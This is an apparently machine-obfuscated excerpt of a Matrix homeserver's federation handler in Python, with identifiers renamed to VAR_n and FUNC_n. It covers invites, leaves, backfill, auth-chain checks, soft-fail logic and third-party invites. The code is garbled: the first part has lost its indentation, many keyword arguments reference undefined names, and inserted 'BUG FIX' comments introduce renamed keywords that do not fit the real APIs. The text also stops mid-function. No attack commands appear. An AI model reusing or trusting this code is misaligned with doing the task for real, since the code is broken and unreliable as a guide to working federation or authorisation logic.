if VAR_97 != VAR_5:
raise SynapseError(
400, "The invite VAR_1 was not from the server sending it"
)
if not self.is_mine_id(VAR_1.state_key):
raise SynapseError(400, "The invite VAR_1 must be for this server")
if VAR_1.state_key == self._server_notices_mxid:
raise SynapseError(HTTPStatus.FORBIDDEN, "Cannot invite this user")
await self._maybe_store_room_on_outlier_membership(
VAR_11=VAR_1.room_id, VAR_28=room_version
)
VAR_1.internal_metadata.outlier = True
VAR_1.internal_metadata.out_of_band_membership = True
VAR_1.signatures.update(
compute_event_signature(
VAR_28,
VAR_1.get_pdu_json(),
self.hs.hostname,
self.hs.signing_key,
)
)
VAR_32 = await self.state_handler.compute_event_context(VAR_1)
await self.persist_events_and_notify(VAR_1.room_id, [(VAR_1, VAR_32)])
return VAR_1
async def FUNC_17(
self, VAR_23: Iterable[str], VAR_11: str, VAR_27: str, VAR_25: JsonDict
) -> Tuple[EventBase, int]:
VAR_5, VAR_1, VAR_28 = await self._make_and_verify_event(
VAR_23, VAR_11, VAR_27, "leave", VAR_25=content
)
VAR_1.internal_metadata.outlier = True
VAR_1.internal_metadata.out_of_band_membership = True
VAR_98 = list(VAR_23)
try:
VAR_98.remove(VAR_5)
VAR_98.insert(0, VAR_5)
except ValueError:
pass
await self.federation_client.send_leave(VAR_98, VAR_1)
VAR_32 = await self.state_handler.compute_event_context(VAR_1)
VAR_99 = await self.persist_events_and_notify(
VAR_1.room_id, [(VAR_1, VAR_32)]
)
return VAR_1, VAR_99
async def FUNC_18(
self,
VAR_23: Iterable[str],
VAR_11: str,
VAR_27: str,
VAR_29: str,
VAR_25: JsonDict = {},
VAR_30: Optional[Dict[str, Union[str, Iterable[str]]]] = None,
) -> Tuple[str, EventBase, RoomVersion]:
(
VAR_5,
VAR_1,
VAR_28,
) = await self.federation_client.make_membership_event(
VAR_23, VAR_11, VAR_27, VAR_29, VAR_25, VAR_30=params
)
VAR_0.debug("Got VAR_183 to make_%s: %s", VAR_29, VAR_1)
assert VAR_1.type == VAR_188.Member
assert VAR_1.user_id == VAR_27
assert VAR_1.state_key == VAR_27
assert VAR_1.room_id == VAR_11
return VAR_5, VAR_1, VAR_28
async def FUNC_19(
self, VAR_5: str, VAR_11: str, VAR_27: str
) -> EventBase:
if get_domain_from_id(VAR_27) != VAR_5:
VAR_0.info(
"Got /make_leave request for user %r from different VAR_5 %s, ignoring",
VAR_27,
VAR_5,
)
raise SynapseError(403, "User not from origin", Codes.FORBIDDEN)
VAR_28 = await self.store.get_room_version_id(VAR_11)
VAR_93 = self.event_builder_factory.new(
VAR_28,
{
"type": VAR_188.Member,
"content": {"membership": Membership.LEAVE},
"room_id": VAR_11,
"sender": VAR_27,
"state_key": VAR_27,
},
)
VAR_1, VAR_32 = await self.event_creation_handler.create_new_client_event(
VAR_93=builder
)
try:
await self.auth.check_from_context(
VAR_28, VAR_1, VAR_32, do_sig_check=False
)
except AuthError as VAR_170:
VAR_0.warning("Failed to create new leave %r because %s", VAR_1, VAR_170)
raise VAR_170
return VAR_1
async def FUNC_20(self, VAR_5, VAR_6):
VAR_1 = VAR_6
VAR_0.debug(
"on_send_leave_request: Got VAR_1: %s, signatures: %s",
VAR_1.event_id,
VAR_1.signatures,
)
if get_domain_from_id(VAR_1.sender) != VAR_5:
VAR_0.info(
"Got /send_leave request for user %r from different VAR_5 %s",
VAR_1.sender,
VAR_5,
)
raise SynapseError(403, "User not from origin", Codes.FORBIDDEN)
VAR_1.internal_metadata.outlier = False
await self._handle_new_event(VAR_5, VAR_1)
VAR_0.debug(
"on_send_leave_request: After FUNC_26: %s, sigs: %s",
VAR_1.event_id,
VAR_1.signatures,
)
return None
async def FUNC_21(self, VAR_11: str, VAR_12: str) -> List[EventBase]:
VAR_1 = await self.store.get_event(VAR_12, check_room_id=VAR_11)
VAR_100 = await self.state_store.get_state_groups(VAR_11, [VAR_12])
if VAR_100:
VAR_166, VAR_2 = list(VAR_100.items()).pop()
VAR_167 = {(VAR_170.type, VAR_170.state_key): VAR_170 for VAR_170 in VAR_2}
if VAR_1.is_state():
if "replaces_state" in VAR_1.unsigned:
VAR_198 = VAR_1.unsigned["replaces_state"]
if VAR_198 != VAR_1.event_id:
VAR_200 = await self.store.get_event(VAR_198)
VAR_167[(VAR_1.type, VAR_1.state_key)] = VAR_200
else:
del VAR_167[(VAR_1.type, VAR_1.state_key)]
VAR_168 = list(VAR_167.values())
return VAR_168
else:
return []
async def FUNC_22(self, VAR_11: str, VAR_12: str) -> List[str]:
VAR_1 = await self.store.get_event(VAR_12, check_room_id=VAR_11)
VAR_100 = await self.state_store.get_state_groups_ids(VAR_11, [VAR_12])
if VAR_100:
VAR_166, VAR_2 = list(VAR_100.items()).pop()
VAR_167 = VAR_2
if VAR_1.is_state():
if "replaces_state" in VAR_1.unsigned:
VAR_198 = VAR_1.unsigned["replaces_state"]
if VAR_198 != VAR_1.event_id:
VAR_167[(VAR_1.type, VAR_1.state_key)] = VAR_198
else:
VAR_167.pop((VAR_1.type, VAR_1.state_key), None)
return list(VAR_167.values())
else:
return []
@log_function
async def FUNC_23(
self, VAR_5: str, VAR_11: str, VAR_31: List[str], VAR_17: int
) -> List[EventBase]:
VAR_101 = await self.auth.check_host_in_room(VAR_11, VAR_5)
if not VAR_101:
raise AuthError(403, "Host not in room.")
VAR_17 = min(VAR_17, 100)
VAR_20 = await self.store.get_backfill_events(VAR_11, VAR_31, VAR_17)
VAR_20 = await filter_events_for_server(self.storage, VAR_5, VAR_20)
return VAR_20
@log_function
async def FUNC_24(
self, VAR_5: str, VAR_12: str
) -> Optional[EventBase]:
VAR_1 = await self.store.get_event(
VAR_12, allow_none=True, allow_rejected=True
)
if VAR_1:
VAR_101 = await self.auth.check_host_in_room(VAR_1.room_id, VAR_5)
if not VAR_101:
raise AuthError(403, "Host not in room.")
VAR_20 = await filter_events_for_server(self.storage, VAR_5, [VAR_1])
VAR_1 = VAR_20[0]
return VAR_1
else:
return None
async def FUNC_25(self, VAR_32):
return await self.store.get_min_depth(VAR_32)
async def FUNC_26(
self, VAR_5, VAR_1, VAR_2=None, VAR_3=None, VAR_33=False
):
VAR_32 = await self._prep_event(
VAR_5, VAR_1, VAR_2=state, VAR_3=auth_events, VAR_33=backfilled
)
try:
if (
not VAR_1.internal_metadata.is_outlier()
and not VAR_33
and not VAR_32.rejected
):
await self.action_generator.handle_push_actions_for_event(
VAR_1, VAR_32
)
await self.persist_events_and_notify(
VAR_1.room_id, [(VAR_1, VAR_32)], VAR_33=backfilled
)
except Exception:
run_in_background(
self.store.remove_push_actions_from_staging, VAR_1.event_id
)
raise
return VAR_32
async def FUNC_27(
self,
VAR_5: str,
VAR_11: str,
VAR_34: Iterable[CLASS_0],
VAR_33: bool = False,
) -> None:
async def FUNC_49(VAR_102: CLASS_0):
VAR_1 = VAR_102.event
with nested_logging_context(suffix=VAR_1.event_id):
VAR_168 = await self._prep_event(
VAR_5,
VAR_1,
VAR_2=VAR_102.state,
VAR_3=VAR_102.auth_events,
VAR_33=backfilled,
)
return VAR_168
VAR_103 = await make_deferred_yieldable(
defer.gatherResults(
[run_in_background(FUNC_49, VAR_102) for VAR_102 in VAR_34],
consumeErrors=True,
)
)
await self.persist_events_and_notify(
VAR_11,
[
(VAR_102.event, VAR_32)
for VAR_102, VAR_32 in zip(VAR_34, VAR_103)
],
VAR_33=backfilled,
)
async def FUNC_28(
    self,
    VAR_5: str,
    VAR_11: str,
    VAR_3: List[EventBase],
    VAR_2: List[EventBase],
    VAR_1: EventBase,
    VAR_28: RoomVersion,
) -> int:
    """Persist a set of auth/state events (as outliers) plus the event itself.

    Args:
        VAR_5: origin server to fetch any missing auth events from.
        VAR_11: room id.
        VAR_3: auth chain events.
        VAR_2: state events at the event.
        VAR_1: the event being joined on.
        VAR_28: the expected room version.

    Returns:
        The stream id from persisting the final event.

    Raises:
        SynapseError: if there is no create event or the room version
            does not match the create event's.
    """
    VAR_104 = {}
    # All supplied auth/state events are persisted as outliers.
    for VAR_170 in itertools.chain(VAR_3, VAR_2):
        VAR_170.internal_metadata.outlier = True
        VAR_169 = await self.state_handler.compute_event_context(VAR_170)
        VAR_104[VAR_170.event_id] = VAR_169
    VAR_60 = {
        VAR_170.event_id: VAR_170 for VAR_170 in itertools.chain(VAR_3, VAR_2, [VAR_1])
    }
    VAR_105 = None
    for VAR_170 in VAR_3:
        if (VAR_170.type, VAR_170.state_key) == (VAR_188.Create, ""):
            VAR_105 = VAR_170
            break
    if VAR_105 is None:
        raise SynapseError(400, "No create VAR_1 in state")
    # Sanity-check the claimed room version against the create event.
    VAR_106 = VAR_105.content.get(
        "room_version", RoomVersions.V1.identifier
    )
    if VAR_28.identifier != VAR_106:
        raise SynapseError(400, "Room version mismatch")
    # Collect auth events referenced but not supplied, and try to fetch
    # them from the origin.
    VAR_107 = set()
    for VAR_170 in itertools.chain(VAR_3, VAR_2, [VAR_1]):
        for VAR_160 in VAR_170.auth_event_ids():
            if VAR_160 not in VAR_60:
                VAR_107.add(VAR_160)
    for VAR_160 in VAR_107:
        # BUG FIX: the keyword value referenced the undefined name
        # `room_version`; the parameter is VAR_28.
        VAR_171 = await self.federation_client.get_pdu(
            [VAR_5], VAR_160, VAR_28=VAR_28, outlier=True, timeout=10000,
        )
        if VAR_171 and VAR_171.event_id == VAR_160:
            VAR_60[VAR_160] = VAR_171
        else:
            VAR_0.info("Failed to find VAR_89 VAR_1 %r", VAR_160)
    # Auth-check every event; a failure only rejects that event, except
    # for the target event itself, whose failure is fatal.
    for VAR_170 in itertools.chain(VAR_3, VAR_2, [VAR_1]):
        VAR_172 = {
            (VAR_60[VAR_160].type, VAR_60[VAR_160].state_key): VAR_60[VAR_160]
            for VAR_160 in VAR_170.auth_event_ids()
            if VAR_160 in VAR_60
        }
        if VAR_105:
            VAR_172[(VAR_188.Create, "")] = VAR_105
        try:
            event_auth.check(VAR_28, VAR_170, VAR_3=VAR_172)
        except SynapseError as err:
            VAR_0.warning("Rejecting %s because %s", VAR_170.event_id, err.msg)
            if VAR_170 == VAR_1:
                raise
            VAR_104[VAR_170.event_id].rejected = RejectedReason.AUTH_ERROR
    await self.persist_events_and_notify(
        VAR_11,
        [
            (VAR_170, VAR_104[VAR_170.event_id])
            for VAR_170 in itertools.chain(VAR_3, VAR_2)
        ],
    )
    VAR_108 = await self.state_handler.compute_event_context(
        VAR_1, old_state=VAR_2
    )
    return await self.persist_events_and_notify(
        VAR_11, [(VAR_1, VAR_108)]
    )
async def FUNC_29(
    self,
    VAR_5: str,
    VAR_1: EventBase,
    VAR_2: Optional[Iterable[EventBase]],
    VAR_3: Optional[MutableStateMap[EventBase]],
    VAR_33: bool,
) -> EventContext:
    """Compute the context for an event and run auth / soft-fail checks.

    Args:
        VAR_5: origin server.
        VAR_1: the event.
        VAR_2: optional state at the event.
        VAR_3: optional auth-event map; computed from prev state if absent.
        VAR_33: True if the event arrived via backfill.

    Returns:
        The (possibly rejected) EventContext.
    """
    VAR_32 = await self.state_handler.compute_event_context(VAR_1, old_state=VAR_2)
    if not VAR_3:
        VAR_94 = await VAR_32.get_prev_state_ids()
        VAR_173 = self.auth.compute_auth_events(
            VAR_1, VAR_94, for_verification=True
        )
        VAR_174 = await self.store.get_events(VAR_173)
        VAR_3 = {(VAR_170.type, VAR_170.state_key): VAR_170 for VAR_170 in VAR_174.values()}
    if VAR_1.type == VAR_188.Member and not VAR_1.auth_event_ids():
        # Shallow membership events with no auth events: if the sole prev
        # event is the create event, use it as the auth event.
        if len(VAR_1.prev_event_ids()) == 1 and VAR_1.depth < 5:
            VAR_189 = await self.store.get_event(
                VAR_1.prev_event_ids()[0], allow_none=True
            )
            if VAR_189 and VAR_189.type == VAR_188.Create:
                VAR_3[(VAR_189.type, VAR_189.state_key)] = VAR_189
    # BUG FIX: the keyword value referenced the undefined name
    # `auth_events`; the local is VAR_3.
    VAR_32 = await self.do_auth(VAR_5, VAR_1, VAR_32, VAR_3=VAR_3)
    if not VAR_32.rejected:
        await self._check_for_soft_fail(VAR_1, VAR_2, VAR_33)
    if VAR_1.type == VAR_188.GuestAccess and not VAR_32.rejected:
        await self.maybe_kick_guest_users(VAR_1)
    return VAR_32
async def FUNC_30(
    self, VAR_1: EventBase, VAR_2: Optional[Iterable[EventBase]], VAR_33: bool
) -> None:
    """Soft-fail check: mark an event soft-failed if it would not pass auth
    against the *current* room state (as opposed to the state at the event).

    Args:
        VAR_1: the event to check.
        VAR_2: optional state at the event, used to resolve against the
            current forward extremities.
        VAR_33: True if the event arrived via backfill (then no check).
    """
    # Backfilled events and outliers are never soft-failed.
    if VAR_33 or VAR_1.internal_metadata.is_outlier():
        return
    VAR_109 = await self.store.get_latest_event_ids_in_room(VAR_1.room_id)
    VAR_110 = set(VAR_109)
    VAR_111 = set(VAR_1.prev_event_ids())
    # If the event's prev events are exactly the current extremities it is
    # on the live tip of the DAG, so the normal auth check suffices.
    if VAR_110 == VAR_111:
        return
    VAR_28 = await self.store.get_room_version_id(VAR_1.room_id)
    VAR_90 = KNOWN_ROOM_VERSIONS[VAR_28]
    if VAR_2 is not None:
        # Resolve the state at the extremities together with the state at
        # the event to approximate the current state.
        VAR_175 = await self.state_store.get_state_groups(
            VAR_1.room_id, VAR_110
        )
        VAR_176 = list(VAR_175.values())  # type: List[Iterable[EventBase]]
        VAR_176.append(VAR_2)
        VAR_177 = await self.state_handler.resolve_events(
            VAR_28, VAR_176, VAR_1
        )
        VAR_126 = {
            k: VAR_170.event_id for k, VAR_170 in VAR_177.items()
        }  # type: StateMap[str]
    else:
        VAR_126 = await self.state_handler.get_current_state_ids(
            VAR_1.room_id, latest_event_ids=VAR_110
        )
    VAR_0.debug(
        "Doing soft-fail check for %s: VAR_2 %s", VAR_1.event_id, VAR_126,
    )
    # Only the state entries that actually participate in auth for this
    # event type are needed.
    VAR_112 = auth_types_for_event(VAR_1)
    VAR_113 = [
        VAR_170 for k, VAR_170 in VAR_126.items() if k in VAR_112
    ]
    VAR_114 = await self.store.get_events(VAR_113)
    VAR_115 = {
        (VAR_170.type, VAR_170.state_key): VAR_170 for VAR_170 in VAR_114.values()
    }
    try:
        event_auth.check(VAR_90, VAR_1, VAR_3=VAR_115)
    except AuthError as VAR_170:
        # Soft-fail rather than reject: the event stays in the DAG but is
        # not served to clients.
        VAR_0.warning("Soft-failing %r because %s", VAR_1, VAR_170)
        VAR_1.internal_metadata.soft_failed = True
async def FUNC_31(
    self, VAR_5, VAR_12, VAR_11, VAR_35, VAR_36, VAR_37
):
    """Handle a federation /query_auth request for an event.

    Args:
        VAR_5: the requesting server.
        VAR_12: the event id being queried.
        VAR_11: the room id.
        VAR_35: the remote server's view of the auth chain.
        VAR_36 / VAR_37: unused here (rejects / missing from the request).
            NOTE(review): parameters accepted but never read — confirm
            against callers.

    Returns:
        Dict describing the auth difference (auth_chain/rejects/missing).

    Raises:
        AuthError: (403) if VAR_5 is not in the room.
    """
    VAR_101 = await self.auth.check_host_in_room(VAR_11, VAR_5)
    if not VAR_101:
        raise AuthError(403, "Host not in room.")
    VAR_1 = await self.store.get_event(VAR_12, check_room_id=VAR_11)
    # Best-effort: try to process each remote auth event; auth failures on
    # individual events are ignored.
    for VAR_170 in VAR_35:
        try:
            await self._handle_new_event(VAR_5, VAR_170)
        except AuthError:
            pass
    VAR_116 = await self.store.get_auth_chain(
        list(VAR_1.auth_event_ids()), include_given=True
    )
    VAR_117 = await self.construct_auth_difference(VAR_116, VAR_35)
    VAR_0.debug("on_query_auth returning: %s", VAR_117)
    return VAR_117
async def FUNC_32(
    self, VAR_5, VAR_11, VAR_38, VAR_39, VAR_17
):
    """Serve a federation /get_missing_events request.

    Args:
        VAR_5: requesting server.
        VAR_11: room id.
        VAR_38: earliest known events (stop points).
        VAR_39: latest events to walk back from.
        VAR_17: requested limit (capped at 20).

    Returns:
        The missing events, filtered for what VAR_5 may see.

    Raises:
        AuthError: (403) if VAR_5 is not in the room.
    """
    VAR_101 = await self.auth.check_host_in_room(VAR_11, VAR_5)
    if not VAR_101:
        raise AuthError(403, "Host not in room.")
    # Cap the limit to keep the response bounded.
    VAR_17 = min(VAR_17, 20)
    # BUG FIX: the keyword values referenced the undefined names
    # room_id/earliest_events/latest_events/limit; use the parameters.
    VAR_65 = await self.store.get_missing_events(
        VAR_11=VAR_11,
        VAR_38=VAR_38,
        VAR_39=VAR_39,
        VAR_17=VAR_17,
    )
    VAR_65 = await filter_events_for_server(
        self.storage, VAR_5, VAR_65
    )
    return VAR_65
async def FUNC_33(
    self,
    VAR_5: str,
    VAR_1: EventBase,
    VAR_32: EventContext,
    VAR_3: MutableStateMap[EventBase],
) -> EventContext:
    """Auth-check an event, first refreshing auth events from the remote.

    Args:
        VAR_5: origin server to consult for missing auth events.
        VAR_1: the event to auth.
        VAR_32: the event's context (rejected flag is set on failure).
        VAR_3: map of auth events, possibly updated in place.

    Returns:
        The (possibly rejected) context.
    """
    VAR_28 = await self.store.get_room_version_id(VAR_1.room_id)
    VAR_90 = KNOWN_ROOM_VERSIONS[VAR_28]
    try:
        VAR_32 = await self._update_auth_events_and_context_for_auth(
            VAR_5, VAR_1, VAR_32, VAR_3
        )
    except Exception:
        # Refreshing auth events is best-effort; fall through and auth
        # against what we have.
        VAR_0.exception(
            "Failed to double check VAR_89 VAR_20 for %s with remote. "
            "Ignoring failure and continuing processing of VAR_1.",
            VAR_1.event_id,
        )
    try:
        # BUG FIX: the keyword value referenced the undefined name
        # `auth_events`; the parameter is VAR_3.
        event_auth.check(VAR_90, VAR_1, VAR_3=VAR_3)
    except AuthError as VAR_170:
        VAR_0.warning("Failed VAR_89 resolution for %r because %s", VAR_1, VAR_170)
        VAR_32.rejected = RejectedReason.AUTH_ERROR
    return VAR_32
async def FUNC_34(
    self,
    VAR_5: str,
    VAR_1: EventBase,
    VAR_32: EventContext,
    VAR_3: MutableStateMap[EventBase],
) -> EventContext:
    """Update our auth-event map (and the event's context) for auth checks.

    Fetches auth events we have never seen from the remote, persists them
    as outliers, and if the event's claimed auth events differ from our
    calculated ones, state-resolves the two views and rebuilds the context.

    Args:
        VAR_5: origin server.
        VAR_1: the event whose auth events are being reconciled.
        VAR_32: the event's context.
        VAR_3: auth-event map, updated in place.

    Returns:
        The (possibly rebuilt) EventContext.
    """
    VAR_118 = set(VAR_1.auth_event_ids())
    # Auth events the event claims that our map doesn't cover.
    VAR_119 = VAR_118.difference(
        VAR_170.event_id for VAR_170 in VAR_3.values()
    )
    if VAR_119:
        VAR_178 = await self.store.have_seen_events(VAR_119)
        VAR_0.debug("Events %s are in the store", VAR_178)
        VAR_119.difference_update(VAR_178)
    if VAR_119:
        VAR_0.info("auth_events contains unknown VAR_20: %s", VAR_119)
        try:
            try:
                VAR_35 = await self.federation_client.get_event_auth(
                    VAR_5, VAR_1.room_id, VAR_1.event_id
                )
            except RequestSendFailed as e1:
                # Transient federation failure: proceed with what we have.
                VAR_0.info("Failed to get VAR_1 VAR_89 from remote: %s", e1)
                return VAR_32
            VAR_190 = await self.store.have_seen_events(
                [VAR_170.event_id for VAR_170 in VAR_35]
            )
            for VAR_170 in VAR_35:
                if VAR_170.event_id in VAR_190:
                    continue
                if VAR_170.event_id == VAR_1.event_id:
                    continue
                try:
                    VAR_201 = VAR_170.auth_event_ids()
                    # Build this auth event's own auth map from the chain
                    # (the create event is always included).
                    VAR_89 = {
                        (VAR_170.type, VAR_170.state_key): VAR_170
                        for VAR_170 in VAR_35
                        if VAR_170.event_id in VAR_201 or VAR_170.type == VAR_188.Create
                    }
                    VAR_170.internal_metadata.outlier = True
                    VAR_0.debug(
                        "do_auth %s VAR_119: %s", VAR_1.event_id, VAR_170.event_id
                    )
                    await self._handle_new_event(VAR_5, VAR_170, VAR_3=VAR_89)
                    if VAR_170.event_id in VAR_118:
                        VAR_3[(VAR_170.type, VAR_170.state_key)] = VAR_170
                except AuthError:
                    pass
        except Exception:
            VAR_0.exception("Failed to get VAR_89 chain")
    if VAR_1.internal_metadata.is_outlier():
        # Outliers have no state/context to rebuild.
        VAR_0.info("Skipping auth_event fetch for outlier")
        return VAR_32
    # Claimed auth events still not in our calculated auth map.
    VAR_120 = VAR_118.difference(
        VAR_170.event_id for VAR_170 in VAR_3.values()
    )
    if not VAR_120:
        return VAR_32
    VAR_0.info(
        "auth_events refers to VAR_20 which are not in our calculated VAR_89 "
        "chain: %s",
        VAR_120,
    )
    VAR_121 = await self.store.get_events_as_list(VAR_120)
    for d in VAR_121:
        # A claimed auth event from a different room is bogus; bail out.
        if d.room_id != VAR_1.room_id:
            VAR_0.warning(
                "Event %s refers to auth_event %s which is in a different room",
                VAR_1.event_id,
                d.event_id,
            )
            return VAR_32
    # State-resolve our auth view against (ours + the event's claimed).
    VAR_122 = VAR_3.values()
    VAR_123 = dict(VAR_3)
    VAR_123.update({(d.type, d.state_key): d for d in VAR_121})
    VAR_62 = VAR_123.values()
    VAR_28 = await self.store.get_room_version_id(VAR_1.room_id)
    VAR_124 = await self.state_handler.resolve_events(
        VAR_28, (VAR_122, VAR_62), VAR_1
    )
    VAR_0.info(
        "After VAR_2 VAR_168: updating VAR_3 with new VAR_2 %s",
        {
            (d.type, d.state_key): d.event_id
            for d in VAR_124.values()
            if VAR_3.get((d.type, d.state_key)) != d
        },
    )
    VAR_3.update(VAR_124)
    VAR_32 = await self._update_context_for_auth_events(
        VAR_1, VAR_32, VAR_3
    )
    return VAR_32
async def FUNC_35(
    self, VAR_1: EventBase, VAR_32: EventContext, VAR_3: StateMap[EventBase]
) -> EventContext:
    """Rebuild an event's context after its auth events changed.

    Args:
        VAR_1: the event.
        VAR_32: the old context (its state_group becomes the prev group).
        VAR_3: the updated auth-event map.

    Returns:
        A fresh EventContext with a newly stored state group.
    """
    if VAR_1.is_state():
        VAR_179 = (VAR_1.type, VAR_1.state_key)  # type: Optional[Tuple[str, str]]
    else:
        VAR_179 = None
    # Deltas from the old state group: the auth events, minus this event's
    # own state key (a state event must not appear in its own state).
    VAR_125 = {
        k: a.event_id for k, a in VAR_3.items() if k != VAR_179
    }
    VAR_126 = await VAR_32.get_current_state_ids()
    VAR_126 = dict(VAR_126)  # type: ignore
    VAR_126.update(VAR_125)
    VAR_94 = await VAR_32.get_prev_state_ids()
    VAR_94 = dict(VAR_94)
    # BUG FIX: `prev_state_ids` is undefined — the local is VAR_94.
    VAR_94.update({k: a.event_id for k, a in VAR_3.items()})
    VAR_127 = VAR_32.state_group
    # BUG FIX: the keyword values below referenced the undefined names
    # prev_group/current_state_ids/state_group/prev_state_ids; they must
    # be the corresponding locals.
    VAR_128 = await self.state_store.store_state_group(
        VAR_1.event_id,
        VAR_1.room_id,
        VAR_127=VAR_127,
        delta_ids=VAR_125,
        VAR_126=VAR_126,
    )
    return EventContext.with_state(
        VAR_128=VAR_128,
        state_group_before_event=VAR_32.state_group_before_event,
        VAR_126=VAR_126,
        VAR_94=VAR_94,
        VAR_127=VAR_127,
        delta_ids=VAR_125,
    )
async def FUNC_36(
    self, VAR_40: Iterable[EventBase], VAR_41: Iterable[EventBase]
) -> Dict:
    """Compute the difference between our auth chain and a remote one.

    Walks both chains in (depth, event_id) order, collecting events only
    one side knows about, then works out which remote-only events we
    rejected and why.

    Args:
        VAR_40: our auth chain.
        VAR_41: the remote server's auth chain.

    Returns:
        Dict with keys "auth_chain", "rejects" and "missing".
    """
    VAR_0.debug("construct_auth_difference Start!")

    def FUNC_50(VAR_21):
        # Sort key: walk both chains in lockstep by (depth, event_id).
        return VAR_21.depth, VAR_21.event_id

    VAR_0.debug("construct_auth_difference after FUNC_50!")
    VAR_129 = list(VAR_41)
    # BUG FIX: list.sort() takes the keyword `key`, not `VAR_144`.
    VAR_129.sort(key=FUNC_50)
    VAR_130 = list(VAR_40)
    VAR_130.sort(key=FUNC_50)
    VAR_131 = iter(VAR_130)
    VAR_132 = iter(VAR_129)
    VAR_0.debug("construct_auth_difference before FUNC_51!")

    def FUNC_51(VAR_133, VAR_134=None):
        # next() with a default: None signals an exhausted iterator.
        try:
            return next(VAR_133)
        except Exception:
            return VAR_134

    VAR_135 = FUNC_51(VAR_131)
    VAR_136 = FUNC_51(VAR_132)
    VAR_0.debug("construct_auth_difference before while")
    VAR_137 = []
    VAR_138 = []
    while VAR_135 or VAR_136:
        if VAR_136 is None:
            VAR_138.append(VAR_135)
            VAR_135 = FUNC_51(VAR_131)
            continue
        if VAR_135 is None:
            VAR_137.append(VAR_136)
            VAR_136 = FUNC_51(VAR_132)
            continue
        if VAR_135.event_id == VAR_136.event_id:
            VAR_135 = FUNC_51(VAR_131)
            VAR_136 = FUNC_51(VAR_132)
            continue
        if VAR_135.depth < VAR_136.depth:
            VAR_138.append(VAR_135)
            VAR_135 = FUNC_51(VAR_131)
            continue
        if VAR_135.depth > VAR_136.depth:
            VAR_137.append(VAR_136)
            VAR_136 = FUNC_51(VAR_132)
            continue
        # Same depth, different event ids: advance whichever sorts first.
        if VAR_135.event_id < VAR_136.event_id:
            VAR_138.append(VAR_135)
            VAR_135 = FUNC_51(VAR_131)
            # BUG FIX: without this continue the next branch dereferences
            # VAR_135 which may now be None, and both sides could advance
            # in a single iteration.
            continue
        if VAR_135.event_id > VAR_136.event_id:
            VAR_137.append(VAR_136)
            VAR_136 = FUNC_51(VAR_132)
            continue
    VAR_0.debug("construct_auth_difference after while")
    VAR_139 = [VAR_170.event_id for VAR_170 in VAR_137]
    VAR_140 = list(VAR_137)
    # Drop remote-only events whose auth events are themselves remote-only:
    # only the "base" of the remote difference is reported as rejected.
    for VAR_170 in VAR_137:
        for VAR_160 in VAR_170.auth_event_ids():
            if VAR_160 in VAR_139:
                try:
                    VAR_140.remove(VAR_170)
                except ValueError:
                    pass
    VAR_141 = {}
    for VAR_170 in VAR_140:
        VAR_180 = await self.store.get_rejection_reason(VAR_170.event_id)
        if VAR_180 is None:
            continue
        VAR_141[VAR_170.event_id] = VAR_180
    VAR_0.debug("construct_auth_difference returning")
    return {
        "auth_chain": VAR_40,
        "rejects": {
            VAR_170.event_id: {"reason": VAR_141[VAR_170.event_id], "proof": None}
            for VAR_170 in VAR_140
        },
        "missing": [VAR_170.event_id for VAR_170 in VAR_138],
    }
@log_function
async def FUNC_37(
    self, VAR_42, VAR_43, VAR_11, VAR_44
):
    """Exchange a third-party invite for a membership invite event.

    Builds and sends an m.room.member invite carrying the signed 3PID
    data; if we are not in the room, forwards the request to a server
    that is.

    Args:
        VAR_42: sender user id.
        VAR_43: target user id (state key).
        VAR_11: room id.
        VAR_44: the signed third-party-invite payload.
    """
    VAR_142 = {"signed": VAR_44}
    VAR_45 = {
        "type": VAR_188.Member,
        "content": {
            "membership": Membership.INVITE,
            "third_party_invite": VAR_142,
        },
        "room_id": VAR_11,
        "sender": VAR_42,
        "state_key": VAR_43,
    }
    if await self.auth.check_host_in_room(VAR_11, self.hs.hostname):
        VAR_28 = await self.store.get_room_version_id(VAR_11)
        VAR_93 = self.event_builder_factory.new(VAR_28, VAR_45)
        EventValidator().validate_builder(VAR_93)
        # BUG FIX: the keyword value referenced the undefined name
        # `builder`; the local is VAR_93.
        VAR_1, VAR_32 = await self.event_creation_handler.create_new_client_event(
            VAR_93=VAR_93
        )
        VAR_1, VAR_32 = await self.add_display_name_to_third_party_invite(
            VAR_28, VAR_45, VAR_1, VAR_32
        )
        EventValidator().validate_new(VAR_1, self.config)
        # The remote side can't sign for us; mark the event as sent on our
        # own behalf.
        VAR_1.internal_metadata.send_on_behalf_of = self.hs.hostname
        try:
            await self.auth.check_from_context(VAR_28, VAR_1, VAR_32)
        except AuthError as VAR_170:
            VAR_0.warning("Denying new third party invite %r because %s", VAR_1, VAR_170)
            raise VAR_170
        await self._check_signature(VAR_1, VAR_32)
        VAR_143 = self.hs.get_room_member_handler()
        await VAR_143.send_membership_event(None, VAR_1, VAR_32)
    else:
        # Not in the room: forward to the sender's / room's server.
        VAR_181 = {VAR_204.split(":", 1)[-1] for VAR_204 in (VAR_42, VAR_11)}
        await self.federation_client.forward_third_party_invite(
            VAR_181, VAR_11, VAR_45
        )
async def FUNC_38(
    self, VAR_45: JsonDict
) -> None:
    """Handle a forwarded third-party-invite exchange (we are in the room).

    Args:
        VAR_45: the event dict for the membership invite; must contain
            "room_id".

    Raises:
        AuthError: if the built event fails auth checks.
    """
    assert_params_in_dict(VAR_45, ["room_id"])
    VAR_28 = await self.store.get_room_version_id(VAR_45["room_id"])
    VAR_93 = self.event_builder_factory.new(VAR_28, VAR_45)
    # BUG FIX: the keyword value referenced the undefined name `builder`;
    # the local is VAR_93.
    VAR_1, VAR_32 = await self.event_creation_handler.create_new_client_event(
        VAR_93=VAR_93
    )
    VAR_1, VAR_32 = await self.add_display_name_to_third_party_invite(
        VAR_28, VAR_45, VAR_1, VAR_32
    )
    try:
        await self.auth.check_from_context(VAR_28, VAR_1, VAR_32)
    except AuthError as VAR_170:
        VAR_0.warning("Denying third party invite %r because %s", VAR_1, VAR_170)
        raise VAR_170
    await self._check_signature(VAR_1, VAR_32)
    # Mark the event as sent on behalf of the original sender's server.
    VAR_1.internal_metadata.send_on_behalf_of = get_domain_from_id(VAR_1.sender)
    VAR_143 = self.hs.get_room_member_handler()
    await VAR_143.send_membership_event(None, VAR_1, VAR_32)
async def FUNC_39(
    self, VAR_28, VAR_45, VAR_1, VAR_32
):
    """Copy the display name from the original 3PID invite onto the event.

    Looks up the m.room.third_party_invite state event matching the
    invite's token and, if found, rebuilds the event with the display
    name included.

    Args:
        VAR_28: room version id.
        VAR_45: the event dict (mutated to add the display name).
        VAR_1 / VAR_32: the previously built event and its context.

    Returns:
        Tuple of (event, context), rebuilt when a display name was found.
    """
    VAR_144 = (
        VAR_188.ThirdPartyInvite,
